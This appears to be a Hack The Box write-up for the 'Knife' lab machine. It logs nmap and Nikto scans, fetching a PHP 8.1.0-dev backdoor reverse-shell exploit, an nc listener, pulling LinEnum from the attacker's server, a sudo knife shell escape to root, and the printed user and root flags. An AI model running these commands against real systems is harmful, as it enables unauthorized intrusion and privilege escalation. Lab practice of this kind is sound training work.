Create Directory, and ran nmap scan
┌──(kali㉿kali)-[~/HTB]
└─$ mkdir Knife
┌──(kali㉿kali)-[~/HTB]
└─$ fish
Welcome to fish, the friendly interactive shell
Type help for instructions on how to use fish
kali@kali ~/HTB> exit
┌──(kali㉿kali)-[~/HTB]
└─$ fish
Welcome to fish, the friendly interactive shell
Type help for instructions on how to use fish
kali@kali ~/HTB> nmap -sV -sC -oA nmap 10.10.10.242
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 05:11 EST
Nmap scan results
kali@kali ~/HTB> nmap -sV -sC -oA nmap 10.10.10.242
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 05:11 EST
Nmap scan report for 10.10.10.242
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be549ca367c315c364717f6a534a4c21 (RSA)
| 256 bf8a3fd406e92e874ec97eab220ec0ee (ECDSA)
|_ 256 1adea1cc37ce53bb1bfb2b0badb3f684 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.30 seconds
Only SSH and Port 80 running
Checking Web on Port 80. Nothing interesting even checking the page source
Doing a Nikto scan we can see that there is PHP/8.1.0-dev
kali@kali ~/HTB> nikto -h http://10.10.10.242:80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.242
+ Target Hostname: 10.10.10.242
+ Target Port: 80
+ Start Time: 2023-01-31 05:17:19 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
Searching this on exploitDB we find an RCE
Download the file to the directory
Download the file from github
kali@kali ~/H/Knife> wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py
--2023-01-31 05:41:44-- https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2318 (2.3K) [text/plain]
Saving to: ‘revshell_php_8.1.0-dev.py’
revshell_php_8.1.0 100%[================>] 2.26K --.-KB/s in 0s
2023-01-31 05:41:44 (20.2 MB/s) - ‘revshell_php_8.1.0-dev.py’ saved [2318/2318]
kali@kali ~/H/Knife>
Confirm our IP as 10.10.14.2
┌──(kali㉿kali)-[~]
└─$ ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:f3:85:ca:56 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.248.128 netmask 255.255.255.0 broadcast 192.168.248.255
inet6 fe80::d387:8bfe:48bc:4ce7 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:bc:43:f0 txqueuelen 1000 (Ethernet)
RX packets 6801 bytes 4102018 (3.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5300 bytes 1027532 (1003.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.2 netmask 255.255.254.0 destination 10.10.14.2
inet6 fe80::7bef:fe43:a3:5dfa prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::1000 prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 1620 bytes 337323 (329.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1748 bytes 135682 (132.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(kali㉿kali)-[~]
└─$
Setup listener on port 4444
└─$ nc -nlvp 4444 -s 10.10.14.2
listening on [10.10.14.2] 4444 ...
Run the reverse shell exploit and got shell with user James
The user.txt flag as below
james@knife:/$ cd ~/
cd ~/
james@knife:~$ cat user.txt
cat user.txt
0bf3b51342128f2734cea46b78230535
james@knife:~$
Privilege Escalation
Doing an ls -alh we cam see that temp has wrx
james@knife:/$ ls -alh
ls -alh
total 84K
drwxr-xr-x 20 root root 4.0K May 18 2021 .
drwxr-xr-x 20 root root 4.0K May 18 2021 ..
lrwxrwxrwx 1 root root 7 Feb 1 2021 bin -> usr/bin
drwxr-xr-x 4 root root 4.0K Jul 23 2021 boot
drwxr-xr-x 2 root root 4.0K May 6 2021 cdrom
drwxr-xr-x 19 root root 4.0K Jan 31 10:11 dev
drwxr-xr-x 99 root root 4.0K May 18 2021 etc
drwxr-xr-x 3 root root 4.0K May 6 2021 home
lrwxrwxrwx 1 root root 7 Feb 1 2021 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Feb 1 2021 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Feb 1 2021 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Feb 1 2021 libx32 -> usr/libx32
drwx------ 2 root root 16K May 6 2021 lost+found
drwxr-xr-x 2 root root 4.0K May 18 2021 media
drwxr-xr-x 2 root root 4.0K May 18 2021 mnt
drwxr-xr-x 5 root root 4.0K May 18 2021 opt
dr-xr-xr-x 355 root root 0 Jan 31 10:11 proc
drwx------ 7 root root 4.0K May 18 2021 root
drwxr-xr-x 26 root root 780 Jan 31 10:11 run
lrwxrwxrwx 1 root root 8 Feb 1 2021 sbin -> usr/sbin
drwxr-xr-x 6 root root 4.0K May 18 2021 snap
drwxr-xr-x 2 root root 4.0K Feb 1 2021 srv
dr-xr-xr-x 13 root root 0 Jan 31 10:11 sys
drwxrwxrwt 15 root root 12K Jan 31 11:04 tmp
drwxr-xr-x 15 root root 4.0K May 18 2021 usr
drwxr-xr-x 14 root root 4.0K May 9 2021 var
Serve LinEnum from my Kali machine after downloading it from Github
kali@kali ~/H/K/LinEnum (master)> ls
CHANGELOG.md CONTRIBUTORS.md LICENSE LinEnum.sh* README.md
kali@kali ~/H/K/LinEnum (master)> python3 -m http.server 90
Pull LinEnum into the machine
james@knife:/tmp$ wget http://10.10.14.2:90/LinEnum.sh
wget http://10.10.14.2:90/LinEnum.sh
--2023-01-31 11:10:36-- http://10.10.14.2:90/LinEnum.sh
Connecting to 10.10.14.2:90... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh.1'
0K .......... .......... .......... .......... ..... 100% 65.5K=0.7s
2023-01-31 11:10:37 (65.5 KB/s) - 'LinEnum.sh.1' saved [46631/46631]
Make the file executable using chmod +x
james@knife:/tmp$ chmod +x LinEnum.sh
chmod +x LinEnum.sh
james@knife:/tmp$
Run the script to check for PrivEsc vulnerabilities
james@knife:/tmp$ ./LinEnum.sh
./LinEnum.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982
[-] Debug Info
[+] Thorough tests = Disabled
Scan started at:
Tue Jan 31 11:13:48 UTC 2023
one of the vulnerabilities found by LineEnum
[-] Super user account(s):
root
[+] We can sudo without supplying a password!
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
[-] Are permissions on /home directories lax:
total 12K
Using GTFObins to check on this binary
Searching for knife we get;
Testing this on the box
uid=1000(james) gid=1000(james) groups=1000(james)
sudo knife exec -E 'exec "/bin/sh"'
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
Root flag
cat root.txt
f8dece9555db10f32f6c7d75b0572f7a